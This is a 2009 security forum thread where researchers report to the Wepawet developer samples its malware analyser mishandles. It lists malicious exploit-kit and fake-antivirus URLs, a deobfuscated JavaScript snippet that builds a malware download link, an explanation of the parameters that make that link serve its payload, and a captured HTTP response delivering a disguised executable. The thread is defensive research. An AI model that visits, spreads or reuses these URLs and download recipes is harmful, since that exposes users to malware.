was distributing Zbot in the past (listed on MDL)
Title: Re: Wepawet issues
Post by: MysteryFCM on May 15, 2009, 11:13:43 am
I can click those URL's in the one you referenced, and it works just fine, but if I pop it into the URL box on the homepage, it consistently returns "invalid hostname"? (just tried again after seeing your reply and it did the same thing) - definately wierd.
Title: Re: Wepawet issues
Post by: CkreM on May 15, 2009, 11:21:06 am
thats really weird...
this is a check i did few minutes ago:
http://wepawet.iseclab.org/view.php?hash=449a2e524b30f201ae5d4c94d72ddd94&t=1242386650&type=js

and now it gives me invalid host name also

**edit**

working again now...
http://wepawet.iseclab.org/view.php?hash=449a2e524b30f201ae5d4c94d72ddd94&t=1242387104&type=js
Title: Re: Wepawet issues
Post by: MysteryFCM on May 15, 2009, 12:19:46 pm
Sporadic DNS issues maybe? (on the server side that is, obviously)
Title: Re: Wepawet issues
Post by: SysAdMini on May 15, 2009, 12:25:43 pm
I have seen this issue yesterday.
I tried the same domain 2 times within 2 minutes.
First time it failed, next time it worked.
Title: Re: Wepawet issues
Post by: JohnC on May 16, 2009, 08:19:46 pm
http://202.73.57.11/arwe/?736361acd09ca9717c9462514beb5205

http://wepawet.cs.ucsb.edu/view.php?hash=431b10d27b2ffd05b7e39a496f058966&t=1242616227&type=js

Says Still processing...

But does not finish.
Title: Re: Wepawet issues
Post by: mercutio on May 17, 2009, 10:04:37 am
For the DNS issues, I've added some redundancies. Hopefully, that will work.

JohnC: we had too many submissions... For now, just reducing the number of outstanding submissions. Adding machines in the next days (but I'll be traveling so it won't be super quick :-( )
Title: Re: Wepawet issues
Post by: MysteryFCM on May 20, 2009, 08:08:05 pm
http://wepawet.cs.ucsb.edu/view.php?hash=30522c73fe1f1fedfbf142606103f39a&t=1242850650&type=js

Definately not benign;

http://hphosts.blogspot.com/2009/05/livecom-poisoning-gumblarmartuz-isnt.html
Title: Re: Wepawet issues
Post by: SysAdMini on May 27, 2009, 02:24:25 pm
Hello Mercutio,

is there a chance to get those new Luckysploit variants decoded ?

examples:
Code: [Select]
poppka.net/pore/?7876256053563003de306eb5c094240d
cameronzfunz.com/spl1/?29e898d7718e8d86e0436480200291b7
Title: Re: Wepawet issues
Post by: mercutio on May 31, 2009, 09:39:44 pm
SysAdMini: still traveling, but it's definitely on the TODO list. Hopefully, I'll have time this week.
Title: Re: Wepawet issues
Post by: MysteryFCM on July 02, 2009, 03:32:08 pm
Just an FYI, Wepawet is failing on this one (also fails if you directly feed it the .js file);

Code: [Select]
trustshield.info/?p=WKmimHVlbHKHjsbIo21zdYWMpYOInKOjY4nT1m6uqI61h8WilnGbk4F5bw==
Previously, you could just decode then analyze the .js file, and determine the URL to use in order to obtain the file, for example;

Code: [Select]
http://guardincorp.info/build[n]_[n].php?cmd=getFile&counter=

> http://guardincorp.info/build08_12.php?cmd=getFile&counter=

This example resulted in a file called Setup_build-1_7.exe. Now however, they seem to have changed it to prevent this, as I'm now seeing it serve a 0KB file if the correct n params are not fed. I've got one here at present that I've decoded, see if you can determine the correct params (going to run it live once I've posted this, to see if I can identify what they've changed).

Code: [Select]
trustshield.info/build93_102.php?cmd=getFile&counter=1&query
This URL was identified via the following code, hidden in the encoded .js file;

Code: [Select]
kPromo.getDownloadURL=function(){return"build"+kPromo.strategy.properties.ls+"_"+kPromo.strategy.properties.uid+".php?cmd=getFile&counter="+kPromo.common.downloadAttemptsCount+"&"+kPromo.base.queryParameters};
Title: Re: Wepawet issues
Post by: MysteryFCM on July 02, 2009, 03:38:32 pm
If you want to save yourself some time, the thing they've changed is the now added requirement of the "p=" var and query having to be present. The URL that I've just seen and checked is;

Code: [Select]
trustshield.info/build93_102.php?cmd=getFile&counter=1&p=nKmimHVlbHKHjsbIo21zdYWMpYOInKOjY4nT1m6uqI61h8WilnGbk4F5bw==
Where 93 and 102 are NOT static numbers (these can still be changed), as can the p= param, aslong as it *looks* like a base64 encoded string. For example;

Code: [Select]
trustshield.info/build9_12.php?cmd=getFile&counter=1&p=WKmimHVlbHKHjsbIo21zdYWMpYOInKOjY4nT1m6uqI61h8WilnGbk4F5bw==
Which is just 1 letter away from the original
Title: Re: Wepawet issues
Post by: MysteryFCM on July 15, 2009, 10:09:13 pm
Wepawet is failing with this one too :( (says it's benign but it isn't)

Code: [Select]
http://lipesr.com/update/?eb70c8bc3e184ffe5a98905e484546d9
http://wepawet.cs.ucsb.edu/view.php?hash=0e28254bfce6009968e5b2982f0c7c33&t=1247695990&type=js
Title: Re: Wepawet issues
Post by: MysteryFCM on July 17, 2009, 08:09:12 pm
Failing to flag a PDF exploit;

http://wepawet.cs.ucsb.edu/view.php?hash=6bbe9ce1b86a70d617c3a5db9285b732&t=1247861571&type=js
Title: Re: Wepawet issues
Post by: mercutio on August 12, 2009, 09:17:20 pm
Folks,

Thanks for reporting issues. I haven't had much time to fix them, but will work on them :-)

In the meanwhile, I've added support for msplinks URLs. Now you can submit them and the links are automatically followed, as in this koobface case:
http://wepawet.cs.ucsb.edu/view.php?hash=4ba993341247cd972535d2e2e400fa1a&t=1250092042&type=js
Title: Re: Wepawet issues
Post by: MysteryFCM on August 13, 2009, 09:36:28 am
Good to hear, cheers :)
Title: Re: Wepawet issues
Post by: SysAdMini on August 18, 2009, 07:20:24 am
Code: [Select]
210.51.187.45/lib/whichDont.pdf
210.51.166.239/lib/someS.pdf

Wepawet fails to decode it. It contains multiple javascript sections and has an interesting obfuscation technique.
Title: Re: Wepawet issues
Post by: SysAdMini on August 18, 2009, 01:44:03 pm
PDF decoding fails.

http://wepawet.cs.ucsb.edu/view.php?hash=59f5b3f049e01cad2137a899da355625&t=1250603399&type=js
Title: Re: Wepawet issues
Post by: mercutio on September 02, 2009, 06:45:54 pm
Mmmh, I had missed these posts, sorry.

On the good side, I have rolled out a better domain summary page. For a given domain, it now reports:
- the IP/ASN it was found on (and links to the FIRE report for the given ASN)
- other domains found on the same IPs
- registration information (registrar, registrant, creation date) [for registrars that are supported]
- a list of the malicious and suspicious URLs detected on the domain
- a list of the exploits detected
- the latest URLs that were analyzed
- other domains that are reachable by visiting pages on the given domain
I find that this page generally gives a good overview of what is going on with a certain domain/server.

See for example the summary for findhereandnow.com, a well-known koobface domain:
http://wepawet.cs.ucsb.edu/domain.php?hash=e5f1e528c0b5656e62af4a049ecc9d6a&type=js

To reach a domain summary page, just click on the link "See the report for domain ..."  at the beginning of an analysis report.

Of course comments and suggestions are welcome!
Title: Re: Wepawet issues
Post by: SysAdMini on October 13, 2009, 05:42:12 pm
Wepawet is unable to decode some YES exploit kits.

examples:
http://wepawet.cs.ucsb.edu/view.php?hash=e8a0395e61f8f18ac10a5ae46b5884c8&t=1255454757&type=js
http://wepawet.cs.ucsb.edu/view.php?hash=37c330fe7b6b3f5b58820c8376f8b2d6&t=1255451348&type=js
Title: Re: Wepawet issues
Post by: SysAdMini on October 23, 2009, 06:23:28 pm
fails decoding Liberty exploit kit

http://wepawet.cs.ucsb.edu/view.php?hash=b4c57b7cdeabcf7681660af8410bd6f4&t=1256321923&type=js
Title: Re: Wepawet issues
Post by: SysAdMini on October 23, 2009, 07:27:19 pm
fails decoding Eleonore exploit pack

http://wepawet.iseclab.org/view.php?hash=10761052023e28a57530712aa23288c7&t=1256237119&type=js
Title: Re: Wepawet issues
Post by: Mr Clean on October 26, 2009, 03:40:59 pm
Check this out,

wepawet reports that this is benign text/html as output.  The malicious server sent a content-type of text/html but the payload was really application/x-msdos-program, wepawet assumed the content was text and went no further

http://wepawet.iseclab.org/view.php?hash=a0db8a069663259f5e60b42a78668278&t=1256571703&type=js

Code: [Select]
GET /default.aspx?a6HIAYORwQ2Co-NWhqfRDIaWlQWBx8YF1ceUBdeSxg2BkJIHh5KXVoOXkFOCwMcysNCDBYek0VGExMYGhp-FVoaSwQSFwpQN15-CB4SWwQOHwJdT0sCXPbGXwgyNkPIzhpbBBYKV9zeFn-g82s2HQYSWwQWGovsEhpPHAIKfxQCE HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) WinNT 5.1
Host: 82.98.231.98
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 26 Oct 2009 15:04:15 GMT
Content-Type: text/html
Content-Length: 166400
Last-Modified: Mon, 26 Oct 2009 14:53:03 GMT
Connection: close
Accept-Ranges: byte

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
$.......................................................................Rich............PE..L......J...........!...
.r...........n......................................H


http://www.virustotal.com/analisis/159651a11584976aab194b7162bf01baccf2585cea4dd6511b145800b4c38ea2-1256572210  5/41
Title: Re: Wepawet issues
Post by: SysAdMini on November 01, 2009, 04:46:22 pm
YES exploit kit, fails decoding

Code: [Select]
maghdfun.cc/
Title: Re: Wepawet issues
Post by: cleanmx on April 02, 2010, 09:26:41 am
wepawet is back online again

--gerhard